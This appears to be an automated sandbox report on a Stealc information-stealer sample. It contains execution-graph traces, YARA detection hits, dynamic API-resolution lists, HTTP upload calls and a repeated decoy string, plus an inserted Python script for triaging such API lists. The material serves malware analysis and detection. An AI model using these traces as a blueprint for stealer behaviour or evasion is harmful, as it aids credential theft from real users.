                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                    Imagebase:0x110000
                                    File size:2'181'632 bytes
                                    MD5 hash:37AD51A72AE2EE4F18F90DB961CA42E0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2197299043.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2154333507.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                      Execution Graph

                                      Execution Coverage:2.9%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:2.9%
                                      Total number of Nodes:1327
                                      Total number of Limit Nodes:24
38393->38394 38395 114610 2 API calls 38394->38395 38396 113dc5 38395->38396 38397 114610 2 API calls 38396->38397 38398 113dde 38397->38398 38399 114610 2 API calls 38398->38399 38400 113df7 38399->38400 38401 114610 2 API calls 38400->38401 38402 113e10 38401->38402 38403 114610 2 API calls 38402->38403 38404 113e29 38403->38404 38405 114610 2 API calls 38404->38405 38406 113e42 38405->38406 38407 114610 2 API calls 38406->38407 38408 113e5b 38407->38408 38409 114610 2 API calls 38408->38409 38410 113e74 38409->38410 38411 114610 2 API calls 38410->38411 38412 113e8d 38411->38412 38413 114610 2 API calls 38412->38413 38414 113ea6 38413->38414 38415 114610 2 API calls 38414->38415 38416 113ebf 38415->38416 38417 114610 2 API calls 38416->38417 38418 113ed8 38417->38418 38419 114610 2 API calls 38418->38419 38420 113ef1 38419->38420 38421 114610 2 API calls 38420->38421 38422 113f0a 38421->38422 38423 114610 2 API calls 38422->38423 38424 113f23 38423->38424 38425 114610 2 API calls 38424->38425 38426 113f3c 38425->38426 38427 114610 2 API calls 38426->38427 38428 113f55 38427->38428 38429 114610 2 API calls 38428->38429 38430 113f6e 38429->38430 38431 114610 2 API calls 38430->38431 38432 113f87 38431->38432 38433 114610 2 API calls 38432->38433 38434 113fa0 38433->38434 38435 114610 2 API calls 38434->38435 38436 113fb9 38435->38436 38437 114610 2 API calls 38436->38437 38438 113fd2 38437->38438 38439 114610 2 API calls 38438->38439 38440 113feb 38439->38440 38441 114610 2 API calls 38440->38441 38442 114004 38441->38442 38443 114610 2 API calls 38442->38443 38444 11401d 38443->38444 38445 114610 2 API calls 38444->38445 38446 114036 38445->38446 38447 114610 2 API calls 38446->38447 38448 11404f 38447->38448 38449 114610 2 API calls 38448->38449 38450 114068 38449->38450 38451 114610 2 API calls 38450->38451 38452 114081 38451->38452 38453 114610 2 API calls 38452->38453 38454 11409a 38453->38454 38455 114610 2 API calls 38454->38455 38456 1140b3 38455->38456 
38457 114610 2 API calls 38456->38457 38458 1140cc 38457->38458 38459 114610 2 API calls 38458->38459 38460 1140e5 38459->38460 38461 114610 2 API calls 38460->38461 38462 1140fe 38461->38462 38463 114610 2 API calls 38462->38463 38464 114117 38463->38464 38465 114610 2 API calls 38464->38465 38466 114130 38465->38466 38467 114610 2 API calls 38466->38467 38468 114149 38467->38468 38469 114610 2 API calls 38468->38469 38470 114162 38469->38470 38471 114610 2 API calls 38470->38471 38472 11417b 38471->38472 38473 114610 2 API calls 38472->38473 38474 114194 38473->38474 38475 114610 2 API calls 38474->38475 38476 1141ad 38475->38476 38477 114610 2 API calls 38476->38477 38478 1141c6 38477->38478 38479 114610 2 API calls 38478->38479 38480 1141df 38479->38480 38481 114610 2 API calls 38480->38481 38482 1141f8 38481->38482 38483 114610 2 API calls 38482->38483 38484 114211 38483->38484 38485 114610 2 API calls 38484->38485 38486 11422a 38485->38486 38487 114610 2 API calls 38486->38487 38488 114243 38487->38488 38489 114610 2 API calls 38488->38489 38490 11425c 38489->38490 38491 114610 2 API calls 38490->38491 38492 114275 38491->38492 38493 114610 2 API calls 38492->38493 38494 11428e 38493->38494 38495 114610 2 API calls 38494->38495 38496 1142a7 38495->38496 38497 114610 2 API calls 38496->38497 38498 1142c0 38497->38498 38499 114610 2 API calls 38498->38499 38500 1142d9 38499->38500 38501 114610 2 API calls 38500->38501 38502 1142f2 38501->38502 38503 114610 2 API calls 38502->38503 38504 11430b 38503->38504 38505 114610 2 API calls 38504->38505 38506 114324 38505->38506 38507 114610 2 API calls 38506->38507 38508 11433d 38507->38508 38509 114610 2 API calls 38508->38509 38510 114356 38509->38510 38511 114610 2 API calls 38510->38511 38512 11436f 38511->38512 38513 114610 2 API calls 38512->38513 38514 114388 38513->38514 38515 114610 2 API calls 38514->38515 38516 1143a1 38515->38516 38517 114610 2 API calls 38516->38517 38518 1143ba 38517->38518 38519 114610 2 
API calls 38518->38519 38520 1143d3 38519->38520 38521 114610 2 API calls 38520->38521 38522 1143ec 38521->38522 38523 114610 2 API calls 38522->38523 38524 114405 38523->38524 38525 114610 2 API calls 38524->38525 38526 11441e 38525->38526 38527 114610 2 API calls 38526->38527 38528 114437 38527->38528 38529 114610 2 API calls 38528->38529 38530 114450 38529->38530 38531 114610 2 API calls 38530->38531 38532 114469 38531->38532 38533 114610 2 API calls 38532->38533 38534 114482 38533->38534 38535 114610 2 API calls 38534->38535 38536 11449b 38535->38536 38537 114610 2 API calls 38536->38537 38538 1144b4 38537->38538 38539 114610 2 API calls 38538->38539 38540 1144cd 38539->38540 38541 114610 2 API calls 38540->38541 38542 1144e6 38541->38542 38543 114610 2 API calls 38542->38543 38544 1144ff 38543->38544 38545 114610 2 API calls 38544->38545 38546 114518 38545->38546 38547 114610 2 API calls 38546->38547 38548 114531 38547->38548 38549 114610 2 API calls 38548->38549 38550 11454a 38549->38550 38551 114610 2 API calls 38550->38551 38552 114563 38551->38552 38553 114610 2 API calls 38552->38553 38554 11457c 38553->38554 38555 114610 2 API calls 38554->38555 38556 114595 38555->38556 38557 114610 2 API calls 38556->38557 38558 1145ae 38557->38558 38559 114610 2 API calls 38558->38559 38560 1145c7 38559->38560 38561 114610 2 API calls 38560->38561 38562 1145e0 38561->38562 38563 114610 2 API calls 38562->38563 38564 1145f9 38563->38564 38565 129f20 38564->38565 38566 129f30 43 API calls 38565->38566 38567 12a346 8 API calls 38565->38567 38566->38567 38568 12a456 38567->38568 38569 12a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38567->38569 38570 12a463 8 API calls 38568->38570 38571 12a526 38568->38571 38569->38568 38570->38571 38572 12a5a8 38571->38572 38573 12a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38571->38573 38574 12a647 38572->38574 38575 12a5b5 6 API calls 38572->38575 38573->38572 38576 
12a654 9 API calls 38574->38576 38577 12a72f 38574->38577 38575->38574 38576->38577 38578 12a7b2 38577->38578 38579 12a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38577->38579 38580 12a7bb GetProcAddress GetProcAddress 38578->38580 38581 12a7ec 38578->38581 38579->38578 38580->38581 38582 12a825 38581->38582 38583 12a7f5 GetProcAddress GetProcAddress 38581->38583 38584 12a922 38582->38584 38585 12a832 10 API calls 38582->38585 38583->38582 38586 12a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38584->38586 38587 12a98d 38584->38587 38585->38584 38586->38587 38588 12a996 GetProcAddress 38587->38588 38589 12a9ae 38587->38589 38588->38589 38590 12a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38589->38590 38591 125ef3 38589->38591 38590->38591 38592 111590 38591->38592 38862 1116b0 38592->38862 38595 12aab0 lstrcpy 38596 1115b5 38595->38596 38597 12aab0 lstrcpy 38596->38597 38598 1115c7 38597->38598 38599 12aab0 lstrcpy 38598->38599 38600 1115d9 38599->38600 38601 12aab0 lstrcpy 38600->38601 38602 111663 38601->38602 38603 125760 38602->38603 38604 125771 38603->38604 38605 12ab30 2 API calls 38604->38605 38606 12577e 38605->38606 38607 12ab30 2 API calls 38606->38607 38608 12578b 38607->38608 38609 12ab30 2 API calls 38608->38609 38610 125798 38609->38610 38611 12aa50 lstrcpy 38610->38611 38612 1257a5 38611->38612 38613 12aa50 lstrcpy 38612->38613 38614 1257b2 38613->38614 38615 12aa50 lstrcpy 38614->38615 38616 1257bf 38615->38616 38617 12aa50 lstrcpy 38616->38617 38639 1257cc 38617->38639 38618 125893 StrCmpCA 38618->38639 38619 1258f0 StrCmpCA 38620 125a2c 38619->38620 38619->38639 38621 12abb0 lstrcpy 38620->38621 38622 125a38 38621->38622 38623 12ab30 2 API calls 38622->38623 38625 125a46 38623->38625 38624 12ab30 lstrlen lstrcpy 38624->38639 38627 12ab30 2 API calls 38625->38627 38626 125aa6 StrCmpCA 38628 125be1 38626->38628 38626->38639 38633 125a55 38627->38633 38632 12abb0 lstrcpy 
38628->38632 38629 12aa50 lstrcpy 38629->38639 38630 12aab0 lstrcpy 38630->38639 38631 12abb0 lstrcpy 38631->38639 38634 125bed 38632->38634 38635 1116b0 lstrcpy 38633->38635 38636 12ab30 2 API calls 38634->38636 38657 125a61 38635->38657 38637 125bfb 38636->38637 38640 12ab30 2 API calls 38637->38640 38638 125c5b StrCmpCA 38641 125c66 Sleep 38638->38641 38642 125c78 38638->38642 38639->38618 38639->38619 38639->38624 38639->38626 38639->38629 38639->38630 38639->38631 38639->38638 38645 111590 lstrcpy 38639->38645 38650 125510 25 API calls 38639->38650 38653 1259da StrCmpCA 38639->38653 38655 125b8f StrCmpCA 38639->38655 38656 125440 20 API calls 38639->38656 38643 125c0a 38640->38643 38641->38639 38644 12abb0 lstrcpy 38642->38644 38646 1116b0 lstrcpy 38643->38646 38647 125c84 38644->38647 38645->38639 38646->38657 38648 12ab30 2 API calls 38647->38648 38649 125c93 38648->38649 38651 12ab30 2 API calls 38649->38651 38650->38639 38652 125ca2 38651->38652 38654 1116b0 lstrcpy 38652->38654 38653->38639 38654->38657 38655->38639 38656->38639 38657->37710 38659 1276e3 GetVolumeInformationA 38658->38659 38660 1276dc 38658->38660 38664 127721 38659->38664 38660->38659 38661 12778c GetProcessHeap RtlAllocateHeap 38662 1277b8 wsprintfA 38661->38662 38663 1277a9 38661->38663 38666 12aa50 lstrcpy 38662->38666 38665 12aa50 lstrcpy 38663->38665 38664->38661 38667 125ff7 38665->38667 38666->38667 38667->37731 38669 12aab0 lstrcpy 38668->38669 38670 1148e9 38669->38670 38871 114800 38670->38871 38672 1148f5 38673 12aa50 lstrcpy 38672->38673 38674 114927 38673->38674 38675 12aa50 lstrcpy 38674->38675 38676 114934 38675->38676 38677 12aa50 lstrcpy 38676->38677 38678 114941 38677->38678 38679 12aa50 lstrcpy 38678->38679 38680 11494e 38679->38680 38681 12aa50 lstrcpy 38680->38681 38682 11495b InternetOpenA StrCmpCA 38681->38682 38683 114994 38682->38683 38684 114f1b InternetCloseHandle 38683->38684 38877 128cf0 38683->38877 38686 114f38 38684->38686 38892 11a210 CryptStringToBinaryA 
38686->38892 38687 1149b3 38885 12ac30 38687->38885 38690 1149c6 38692 12abb0 lstrcpy 38690->38692 38698 1149cf 38692->38698 38693 12ab30 2 API calls 38694 114f55 38693->38694 38695 12acc0 4 API calls 38694->38695 38697 114f6b 38695->38697 38696 114f77 codecvt 38700 12aab0 lstrcpy 38696->38700 38699 12abb0 lstrcpy 38697->38699 38701 12acc0 4 API calls 38698->38701 38699->38696 38713 114fa7 38700->38713 38702 1149f9 38701->38702 38703 12abb0 lstrcpy 38702->38703 38704 114a02 38703->38704 38705 12acc0 4 API calls 38704->38705 38706 114a21 38705->38706 38707 12abb0 lstrcpy 38706->38707 38708 114a2a 38707->38708 38709 12ac30 3 API calls 38708->38709 38710 114a48 38709->38710 38711 12abb0 lstrcpy 38710->38711 38712 114a51 38711->38712 38714 12acc0 4 API calls 38712->38714 38713->37734 38715 114a70 38714->38715 38716 12abb0 lstrcpy 38715->38716 38717 114a79 38716->38717 38718 12acc0 4 API calls 38717->38718 38719 114a98 38718->38719 38720 12abb0 lstrcpy 38719->38720 38721 114aa1 38720->38721 38722 12acc0 4 API calls 38721->38722 38723 114acd 38722->38723 38724 12ac30 3 API calls 38723->38724 38725 114ad4 38724->38725 38726 12abb0 lstrcpy 38725->38726 38727 114add 38726->38727 38728 114af3 InternetConnectA 38727->38728 38728->38684 38729 114b23 HttpOpenRequestA 38728->38729 38731 114b78 38729->38731 38732 114f0e InternetCloseHandle 38729->38732 38733 12acc0 4 API calls 38731->38733 38732->38684 38734 114b8c 38733->38734 38735 12abb0 lstrcpy 38734->38735 38736 114b95 38735->38736 38737 12ac30 3 API calls 38736->38737 38738 114bb3 38737->38738 38739 12abb0 lstrcpy 38738->38739 38740 114bbc 38739->38740 38741 12acc0 4 API calls 38740->38741 38742 114bdb 38741->38742 38743 12abb0 lstrcpy 38742->38743 38744 114be4 38743->38744 38745 12acc0 4 API calls 38744->38745 38746 114c05 38745->38746 38747 12abb0 lstrcpy 38746->38747 38748 114c0e 38747->38748 38749 12acc0 4 API calls 38748->38749 38750 114c2e 38749->38750 38751 12abb0 lstrcpy 38750->38751 38752 114c37 38751->38752 38753 
12acc0 4 API calls 38752->38753 38754 114c56 38753->38754 38755 12abb0 lstrcpy 38754->38755 38756 114c5f 38755->38756 38757 12ac30 3 API calls 38756->38757 38758 114c7d 38757->38758 38759 12abb0 lstrcpy 38758->38759 38760 114c86 38759->38760 38761 12acc0 4 API calls 38760->38761 38762 114ca5 38761->38762 38763 12abb0 lstrcpy 38762->38763 38764 114cae 38763->38764 38765 12acc0 4 API calls 38764->38765 38766 114ccd 38765->38766 38767 12abb0 lstrcpy 38766->38767 38768 114cd6 38767->38768 38769 12ac30 3 API calls 38768->38769 38770 114cf4 38769->38770 38771 12abb0 lstrcpy 38770->38771 38772 114cfd 38771->38772 38773 12acc0 4 API calls 38772->38773 38774 114d1c 38773->38774 38775 12abb0 lstrcpy 38774->38775 38776 114d25 38775->38776 38777 12acc0 4 API calls 38776->38777 38778 114d46 38777->38778 38779 12abb0 lstrcpy 38778->38779 38780 114d4f 38779->38780 38781 12acc0 4 API calls 38780->38781 38782 114d6f 38781->38782 38783 12abb0 lstrcpy 38782->38783 38784 114d78 38783->38784 38785 12acc0 4 API calls 38784->38785 38786 114d97 38785->38786 38787 12abb0 lstrcpy 38786->38787 38788 114da0 38787->38788 38789 12ac30 3 API calls 38788->38789 38790 114dbe 38789->38790 38791 12abb0 lstrcpy 38790->38791 38792 114dc7 38791->38792 38793 12aa50 lstrcpy 38792->38793 38794 114de2 38793->38794 38795 12ac30 3 API calls 38794->38795 38796 114e03 38795->38796 38797 12ac30 3 API calls 38796->38797 38798 114e0a 38797->38798 38799 12abb0 lstrcpy 38798->38799 38800 114e16 38799->38800 38801 114e37 lstrlen 38800->38801 38802 114e4a 38801->38802 38803 114e53 lstrlen 38802->38803 38891 12ade0 38803->38891 38805 114e63 HttpSendRequestA 38806 114e82 InternetReadFile 38805->38806 38807 114eb7 InternetCloseHandle 38806->38807 38812 114eae 38806->38812 38810 12ab10 38807->38810 38809 12acc0 4 API calls 38809->38812 38810->38732 38811 12abb0 lstrcpy 38811->38812 38812->38806 38812->38807 38812->38809 38812->38811 38898 12ade0 38813->38898 38815 121a14 StrCmpCA 38816 121a1f ExitProcess 38815->38816 
38827 121a27 38815->38827 38817 121c12 38817->37736 38818 121b1f StrCmpCA 38818->38827 38819 121afd StrCmpCA 38819->38827 38820 121b82 StrCmpCA 38820->38827 38821 121b63 StrCmpCA 38821->38827 38822 121bc0 StrCmpCA 38822->38827 38823 121b41 StrCmpCA 38823->38827 38824 121ba1 StrCmpCA 38824->38827 38825 121acf StrCmpCA 38825->38827 38826 121aad StrCmpCA 38826->38827 38827->38817 38827->38818 38827->38819 38827->38820 38827->38821 38827->38822 38827->38823 38827->38824 38827->38825 38827->38826 38828 12ab30 lstrlen lstrcpy 38827->38828 38828->38827 38829->37742 38830->37744 38831->37750 38832->37752 38833->37758 38834->37760 38835->37764 38836->37768 38837->37772 38838->37778 38839->37780 38840->37784 38841->37798 38842->37802 38843->37801 38844->37797 38845->37801 38846->37816 38847->37839 38848->37805 38849->37809 38850->37828 38851->37835 38852->37844 38853->37826 38854->37829 38855->37854 38856->37859 38857->37858 38858->37855 38859->37858 38860->37868 38863 12aab0 lstrcpy 38862->38863 38864 1116c3 38863->38864 38865 12aab0 lstrcpy 38864->38865 38866 1116d5 38865->38866 38867 12aab0 lstrcpy 38866->38867 38868 1116e7 38867->38868 38869 12aab0 lstrcpy 38868->38869 38870 1115a3 38869->38870 38870->38595 38872 114816 38871->38872 38873 114888 lstrlen 38872->38873 38897 12ade0 38873->38897 38875 114898 InternetCrackUrlA 38876 1148b7 38875->38876 38876->38672 38878 12aa50 lstrcpy 38877->38878 38879 128d04 38878->38879 38880 12aa50 lstrcpy 38879->38880 38881 128d12 GetSystemTime 38880->38881 38883 128d29 38881->38883 38882 12aab0 lstrcpy 38884 128d8c 38882->38884 38883->38882 38884->38687 38887 12ac41 38885->38887 38886 12ac98 38888 12aab0 lstrcpy 38886->38888 38887->38886 38889 12ac78 lstrcpy lstrcat 38887->38889 38890 12aca4 38888->38890 38889->38886 38890->38690 38891->38805 38893 11a249 LocalAlloc 38892->38893 38894 114f3e 38892->38894 38893->38894 38895 11a264 CryptStringToBinaryA 38893->38895 38894->38693 38894->38696 38895->38894 38896 11a289 LocalFree 
38895->38896 38896->38894 38897->38875 38898->38815

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph for 129bb0-129f12 (edge list summarised): 129bb0-129bc4 call 129aa0 -> either 129bca-129dde (call 129ad0, GetProcAddress * 21) or directly 129de3-129e42 (LoadLibraryA * 5) -> five GetProcAddress blocks, each skipped by a conditional: 129e44-129e58 (x1), 129e66-129e91 (x2), 129e9f-129eb3 (x1), 129ec1-129ed4 (x1), 129ee2-129f0c (x2) -> 129f11-129f12.
                                      APIs
                                      • GetProcAddress.KERNEL32(76210000,00E31660), ref: 00129BF1
                                      • GetProcAddress.KERNEL32(76210000,00E31768), ref: 00129C0A
                                      • GetProcAddress.KERNEL32(76210000,00E31588), ref: 00129C22
                                      • GetProcAddress.KERNEL32(76210000,00E31708), ref: 00129C3A
                                      • GetProcAddress.KERNEL32(76210000,00E315A0), ref: 00129C53
                                      • GetProcAddress.KERNEL32(76210000,00E39250), ref: 00129C6B
                                      • GetProcAddress.KERNEL32(76210000,00E266F8), ref: 00129C83
                                      • GetProcAddress.KERNEL32(76210000,00E26678), ref: 00129C9C
                                      • GetProcAddress.KERNEL32(76210000,00E316D8), ref: 00129CB4
                                      • GetProcAddress.KERNEL32(76210000,00E31618), ref: 00129CCC
                                      • GetProcAddress.KERNEL32(76210000,00E31648), ref: 00129CE5
                                      • GetProcAddress.KERNEL32(76210000,00E31678), ref: 00129CFD
                                      • GetProcAddress.KERNEL32(76210000,00E26818), ref: 00129D15
                                      • GetProcAddress.KERNEL32(76210000,00E316F0), ref: 00129D2E
                                      • GetProcAddress.KERNEL32(76210000,00E31720), ref: 00129D46
                                      • GetProcAddress.KERNEL32(76210000,00E26878), ref: 00129D5E
                                      • GetProcAddress.KERNEL32(76210000,00E31750), ref: 00129D77
                                      • GetProcAddress.KERNEL32(76210000,00E31780), ref: 00129D8F
                                      • GetProcAddress.KERNEL32(76210000,00E26578), ref: 00129DA7
                                      • GetProcAddress.KERNEL32(76210000,00E31828), ref: 00129DC0
                                      • GetProcAddress.KERNEL32(76210000,00E264D8), ref: 00129DD8
                                      • LoadLibraryA.KERNEL32(00E31858,?,00126CA0), ref: 00129DEA
                                      • LoadLibraryA.KERNEL32(00E317F8,?,00126CA0), ref: 00129DFB
                                      • LoadLibraryA.KERNEL32(00E31870,?,00126CA0), ref: 00129E0D
                                      • LoadLibraryA.KERNEL32(00E31888,?,00126CA0), ref: 00129E1F
                                      • LoadLibraryA.KERNEL32(00E318A0,?,00126CA0), ref: 00129E30
                                      • GetProcAddress.KERNEL32(75B30000,00E318B8), ref: 00129E52
                                      • GetProcAddress.KERNEL32(751E0000,00E31810), ref: 00129E73
                                      • GetProcAddress.KERNEL32(751E0000,00E31840), ref: 00129E8B
                                      • GetProcAddress.KERNEL32(76910000,00E394C8), ref: 00129EAD
                                      • GetProcAddress.KERNEL32(75670000,00E264F8), ref: 00129ECE
                                      • GetProcAddress.KERNEL32(77310000,00E39190), ref: 00129EEF
                                      • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00129F06
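The list above is the raw evidence for the "Extensive use of GetProcAddress" and "dynamically determine API calls" behaviour: 28 lookups spread over six module handles, five of them obtained by LoadLibraryA, and only one name (NtQueryInformationProcess) readable as a string because the others are passed as pointers into decrypted memory. The script below is an added example for triaging such a list; it is not part of the Joe Sandbox report nor of the sample. It assumes lines of the form `• API.MODULE(arg, ...), ref: <code address>` with unresolved arguments printed as 8 hex digits or `?`, and, for VirtualProtect, that arguments are printed in declaration order (lpAddress, dwSize, flNewProtect, lpOldProtect). The sample input is a constructed subset of the lines above plus the two calls listed for 114610 further down.

```python
"""Summarise the 'APIs' list of a Joe Sandbox function view.

Added example, not part of the Joe Sandbox report or of the analysed sample.
Assumed line form: '• API.MODULE(arg, ...), ref: <code address>', unresolved
arguments printed as 8 hex digits or '?'. VirtualProtect arguments are assumed
to be in declaration order (lpAddress, dwSize, flNewProtect, lpOldProtect).
"""
import re
from collections import Counter

LINE_RE = re.compile(r"^\s*\u2022?\s*(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")
HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Page-protection constants from <winnt.h>, used to decode flNewProtect.
PAGE_FLAGS = [
    (0x01, "PAGE_NOACCESS"), (0x02, "PAGE_READONLY"), (0x04, "PAGE_READWRITE"),
    (0x08, "PAGE_WRITECOPY"), (0x10, "PAGE_EXECUTE"), (0x20, "PAGE_EXECUTE_READ"),
    (0x40, "PAGE_EXECUTE_READWRITE"), (0x80, "PAGE_EXECUTE_WRITECOPY"),
    (0x100, "PAGE_GUARD"), (0x200, "PAGE_NOCACHE"), (0x400, "PAGE_WRITECOMBINE"),
]


def decode_page_protection(value):
    """Expand a flNewProtect value into the symbolic flags it contains."""
    return [name for bit, name in PAGE_FLAGS if value & bit]


def parse_api_line(line):
    """One '• API.MODULE(args), ref: addr' line -> dict, or None if it is not one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    api, module, args, ref = m.groups()
    return {"api": api, "module": module, "ref": int(ref, 16),
            "args": [a.strip() for a in args.split(",")] if args else []}


def is_opaque(arg):
    """True for arguments the sandbox could not read back (a pointer or '?')."""
    return arg == "?" or HEX8_RE.match(arg) is not None


def summarise(text):
    calls = [c for c in map(parse_api_line, text.splitlines()) if c]
    gpa = [c for c in calls if c["api"] == "GetProcAddress"]
    loads = [c["ref"] for c in calls if c["api"] == "LoadLibraryA"]
    first_load = min(loads) if loads else None
    return {
        "counts": dict(Counter(c["api"] for c in calls)),
        # how many names were resolved against each module handle
        "getprocaddress_by_module": dict(Counter(c["args"][0] for c in gpa)),
        # import names the sandbox could read as strings (the rest were only pointers)
        "named_imports": sorted({c["args"][1] for c in gpa
                                 if len(c["args"]) > 1 and not is_opaque(c["args"][1])}),
        # handles passed to GetProcAddress at code addresses before the first LoadLibraryA:
        # the sample obtained those module bases some other way (imports, PEB walk, ...)
        "handles_before_first_loadlibrary": sorted({
            c["args"][0] for c in gpa if first_load is None or c["ref"] < first_load}),
        # every VirtualProtect whose flNewProtect was readable, decoded into flags
        "protection_changes": [
            (f"{c['ref']:08X}", c["args"][2], decode_page_protection(int(c["args"][2], 16)))
            for c in calls if c["api"] == "VirtualProtect"
            and len(c["args"]) >= 3 and HEX8_RE.match(c["args"][2])],
    }


# Constructed sample: a subset of the lines reported for 129bb0 plus the two
# calls reported for 114610.
SAMPLE_LINES = """\
• GetProcAddress.KERNEL32(76210000,00E31660), ref: 00129BF1
• GetProcAddress.KERNEL32(76210000,00E31768), ref: 00129C0A
• GetProcAddress.KERNEL32(76210000,00E31588), ref: 00129C22
• LoadLibraryA.KERNEL32(00E31858,?,00126CA0), ref: 00129DEA
• LoadLibraryA.KERNEL32(00E317F8,?,00126CA0), ref: 00129DFB
• GetProcAddress.KERNEL32(75B30000,00E318B8), ref: 00129E52
• GetProcAddress.KERNEL32(751E0000,00E31810), ref: 00129E73
• GetProcAddress.KERNEL32(751E0000,00E31840), ref: 00129E8B
• GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00129F06
• RtlAllocateHeap.NTDLL(00000000), ref: 0011465F
• VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 001147EC
"""

if __name__ == "__main__":
    for key, value in summarise(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

On the sample it reports that handle 76210000 was used before any LoadLibraryA ran and that the VirtualProtect at 001147EC sets 0x100, which decodes to PAGE_GUARD; whether that is what the sample intends depends on the argument-order assumption stated in the docstring, so check it against the disassembly before relying on it.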
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: NtQueryInformationProcess$xe$xf$xh
                                      • API String ID: 2238633743-3466325136
                                      • Opcode ID: 0c2cb0fde46f4a7c507a437b61310ff78d50f012e8365228532c6a561c6f97af
                                      • Instruction ID: 1d928d0bcd7130c4272e01384b346f9f557e71b9e7e577e4efc100ace6eb0166
                                      • Opcode Fuzzy Hash: 0c2cb0fde46f4a7c507a437b61310ff78d50f012e8365228532c6a561c6f97af
                                      • Instruction Fuzzy Hash: C5A14CB55182809FC366DFA8FCC99567BADE75D341F108B1ABA09CB2F0D734A941CB60

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph for 114610-1147f9 (edge list summarised): 114610-1146e5 RtlAllocateHeap -> 1146f0-1146f6 (loop header) -> either 1146fc-11479a (loop body, back to 1146f0) or 11479f-1147f9 VirtualProtect.
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0011465F
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 001147EC
                                      Strings
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (27, all within 114610-1147f9): 00114617, 00114622, 0011462D, 00114638, 00114643, 00114667, 00114672, 0011467D, 00114688, 00114693, 001146A7, 001146BD, 001146C8, 001146D3, 001146FC, 00114707, 00114712, 0011471D, 00114763, 0011476E, 00114779, 00114784, 0011478F, 0011479F, 001147B5, 001147C0, 001147CB
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00114728
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001147AA
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001146B2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
